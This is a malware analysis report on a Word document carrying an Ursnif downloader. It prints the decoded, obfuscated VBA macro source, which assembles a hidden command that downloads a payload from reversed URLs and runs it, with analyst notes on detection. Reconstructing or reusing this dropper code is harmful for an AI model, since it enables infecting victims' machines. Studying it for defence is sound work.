Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d989e99bef447192…

MALICIOUS

Office (OLE)

65.9 KB Created: 2018-09-05 10:44:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: af4a876aaf10365303cd98ecb45d80ff SHA-1: a98aacdc7c731a07a826d3f3820319643dba7b1c SHA-256: d989e99bef4471920aed8d190b3818be2fbd9957d70ce334259cf2719af4f98f
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_Open macro passes a command-line string, assembled from obfuscated fragments returned by helper functions, to Shell(). This string appears to be designed to download and execute a second-stage payload: the reconstructed command below reads as reversed PowerShell (for example 'metI-ekovnI' is 'Invoke-Item' reversed and 'eliFdao lwoD' is 'DownloadFile'): 'cmd /V:ON/C set BQX9= }{;kact;wfm$ metI-ekovnI;) wfm$ ,vmU $(eliFdao lwoD.jiF${yrt}{ HZ$ ni v mU$(hcaerof; 'e xe.' + ' c'. The ClamAV detection also points to a downloader family.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is an OOXML schema namespace identifier, not a network indicator.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4608 bytes
SHA-256: f1fc30de85d3d49abcab9506a45d81306556d468d43b8fd1f54ff835f0558c10
Preview script
First 1,000 lines of the extracted script
' [analyst note] Module attributes emitted by the VBA exporter for the first
' module. VB_Base = "1Normal.ThisDocument" indicates this is presumably the
' document's ThisDocument module, which is why a Document_open handler defined
' in it runs automatically when the file is opened with macros enabled.
Attribute VB_Name = "WCwQznHLcUq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst note] Auto-executing handler: Word runs Document_Open when the file is
' opened with macros enabled (heuristic OLE_VBA_DOCOPEN). The only effective
' statement in the body is the VBA.Shell call; the Hour lines around it are filler.
Private Sub Document_open()
' [analyst note] "On Error Resume Next" split across line continuations. Any
' runtime error raised by the filler lines below is silently swallowed, so the
' procedure always reaches the Shell call.
On _
Error _
Resume _
Next
   ' [analyst note] Hour() is a VBA date function; called on concatenated string
   ' literals it does no useful work (a type-mismatch error would be suppressed by
   ' the handler above). These lines appear to be padding around the real statement.
   Hour "45695318" + "497880431" + "368420336" + "Kq"
   Hour "261857369" + "IHUiYIU"
   Hour "MhbG" + "Jp" + "Dh" + "8832"
   Hour "6250" + "ca" + "90484060" + "wuaNvw"
' [analyst note] The command line is the concatenation of CleanString(bDz)
' (presumably Word's Application.CleanString) with six more values. rTbiFCWCIAb
' and CstXEQRE are the Functions in the next module; bDz, baZRzAjX, MaQGmoTmNz,
' nmPFZTfwFUMR and MhMjsiOjc are not defined in the visible part of the dump and
' are likely in the truncated remainder. The window-style argument 21 - 21
' evaluates to 0 (vbHide), so the spawned cmd.exe runs without a visible window —
' a good detection signal alongside Shell() being called from Document_Open.
VBA.Shell CleanString(bDz) + baZRzAjX + MaQGmoTmNz + rTbiFCWCIAb + CstXEQRE + nmPFZTfwFUMR + MhMjsiOjc, 21 - 21
   ' [analyst note] More filler, same pattern as above.
   Hour "wX" + "bmZjHYX" + "446343545" + "469253301"
   Hour "rzT" + "399519562"
   Hour "aPOHRmUAomn" + "u"
End Sub



' [analyst note] Second module; holds the helper functions whose return values
' Document_open concatenates into the Shell() command line.
Attribute VB_Name = "TRzEQooi"
' [analyst note] Returns the leading segment of the command line. Six string
' fragments are concatenated at the end of the function; the "^" characters are
' cmd.exe escape characters that the command interpreter strips, and
' Chr(1 + 3 + 4 + 3 + 23) is Chr(34), a double quote. With the carets removed,
' several fragments read as reversed PowerShell (for example "eliFdaolnwoD" is
' "DownloadFile" and "metI-ekovnI" is "Invoke-Item"), consistent with the
' downloader behaviour summarised in the report. "cmd /V:ON" (delayed variable
' expansion) combined with caret-heavy strings is a recognisable obfuscation
' pattern worth a detection rule. The Hour lines are filler; any error they raise
' is suppressed by the On Error Resume Next below.
Function rTbiFCWCIAb()

On _
Error _
Resume _
Next
Hour "7350" + "6518"
   Hour "FojzYaNCu" + "jIf" + "1725" + "5423"
   Hour "258508250" + "428513791"
   Hour "mp" + "rH" + "7755" + "459352342"
' [analyst note] Fragment 1: "cmd /V:ON/C" followed by a double quote and "set BQX9=".
MBLtvrQ = "cmd /V" + "^:^ON/C" + Chr(1 + 3 + 4 + 3 + 23) + "^s^e^" + "t B^" + "Q^X^" + "9=  ^ " + "^" + "   " + "   ^  " + "^   " + "  ^ }}{"
Hour "51420072" + "PRLdN" + "46463258" + "VNVG"
   Hour "o" + "FzjwWRhVQ" + "NFz" + "FmaDwGjG"
' [analyst note] Fragments 2-6: the reversed PowerShell body, assembled below.
DuRjicQh = "hc^t^a" + "c" + "};k" + "a^er^b" + ";wf" + "m^$" + " me^t^I" + "^-^ek" + "ovn^I^" + ";)" + "^wf^m^$" + "^ ^,vm" + "U"
Hour "2438" + "233338130" + "229787327" + "juVnZIn"
   Hour "jOIKfXsuAbQH" + "9116"
pvorCz = "^$(^e" + "^liF" + "^da" + "o^ln^" + "wo^D.ji" + "F^${yrt" + "{)^" + "HZ^" + "O$^ n^i" + " v"
Hour "i" + "FJhNwkzHn" + "MhrbZbG" + "248662824"
IwwUkLR = "^m^U" + "$(^hc" + "a^er" + "^of^" + ";^'e" + "^xe" + ".^'" + "+^z^Z" + "C" + "$+" + "^" + "'\'^+c"
Hour "PYb" + "193772078"
   Hour "GmTjUONEsCi" + "dkiIDrAjM" + "A" + "jHZREQhi"
   Hour "cvD" + "DFhEBH" + "wvLDcFSCcW" + "389180915"
   Hour "463389409" + "szjbS" + "wd" + "YvddVMWMj"
   Hour "bzlczMp" + "AcVwfEsjcbZrh"
aVqHBH = "il" + "^bu" + "^p:vne^" + "$^=wfm^" + "$;'8^55" + "^'^ ^= " + "^z^ZC" + "^$^;)'" + "@'(t^i" + "^lpS.'" + "f" + "^d^2P"
Hour "3146" + "Ycfu"
   Hour "7202" + "j" + "s" + "6596"
   Hour "hw" + "lpSXTov"
YLaJrJXF = "^WN^DjM" + "/" + "^xm" + ".^mo" + "c^."
' [analyst note] The function's return value: all six fragments in order.
rTbiFCWCIAb = MBLtvrQ + DuRjicQh + pvorCz + IwwUkLR + aVqHBH + YLaJrJXF
   Hour "252349632" + "Yz"
   Hour "iHnYw" + "7580"
End Function
Function CstXEQRE()

On _
Error _
Resume _
Next
Hour "123967029" + "343368036" + "8000" + "UuXiEIBWfWh"
   Hour "198568949" + "1088"
   Hour "293932554" + "2851"
KZzVJozo = "tes^a^j" + "/" + "/^:^" + "pt^th@^" + "5n^8^6V" + "q^hs8/" + "^b" + "^ulc.e" + "n^ineh" + "^t/" + "/^" + ":^p" + "t^th^"
Hour "rdKPiDZ" + "523" + "MDoS" + "T"
   Hour "4596" + "jKDQfKVkn"
   Hour "RznpmBovPSjG" + "468749720" + "LTI" + "lo"
   Hour "lA" + "9164"
   Hour "zf" + "JsqMqsTRq" + "119714309" + "FoMwwp"
iTVIioEKNGu = "@pnSH^" + "Om^1" + "/" + "^sr.vs" + "^j" + "/" + "/^:^p" + "^" + "t" + "^th^" + "@6C^8"
Hour "cr" + "ocJqCmnzlWU"
   Hour "M" + "SFBkjB" + "iDUUR" + "ftLbEXwS"
   Hour "GfvUmzDH" + "5774"
CRZpwJH = "^" + "k^d^" + "0^Q^H" + "^U/u" + "r.nnov^" + "o^ki^" + "l^u" + "k" + "//:^pt" + "th" + "@^"
Hour "350361319" + "OKd"
   Hour "3922" + "240794620"
ldoiUX = "U7" + "c^Pk" + "^49d^K^" + "U/^" + "ur^." + "^hsim" + "i" + "/"
Hour "490064355" + "117328727" + "373166073" + "vF"
   Hour "ifA" + "8119"
uOEiHjQ = "/^:^" + "p^t" + "^th" + "^" + "'=H^ZO$" + ";^tne" + "^i^lC" + "b"
Hour "OoGXzujwfcsUJb" + "iW" + "174076733" + "6960"
   Hour "3978" + "TEbo" + "tXYJYHn" + "OWFcwGO"
QQlGGGWawp = "e^W.t^" + "eN^" + " ^tce^" + "jbo" + "-wen^=^" + "j^i^F" + "$ l^le" + "h^srew" + "^o^" + "p" + "&&^fo" + "r /^L %"
Hour "3920" + "6248"
   Hour "7235" + "VZVav" + "353840032" + "d"
   Hour "6150" + "jdcV"
   Hour "236548786" + "135836334" + "380056020" + "KRD"
QHXFAW = "^" + "6 ^in (" + "^3" + "49^;^" + "-^1^" + ";^0)^" + "do " + "^s^et" + " e^I=!e"
Hour "129717821" + "KbSc" + "cmuZs" + "kPTJ"
   Hour "1068" + "pGGmVbj"
   Hour "6426" + "2817" + "5767" + "127656302"
   Hour "jXnFOETb" + "fcw"
JVwBwiRGjP = "^I!!B^Q
... (truncated)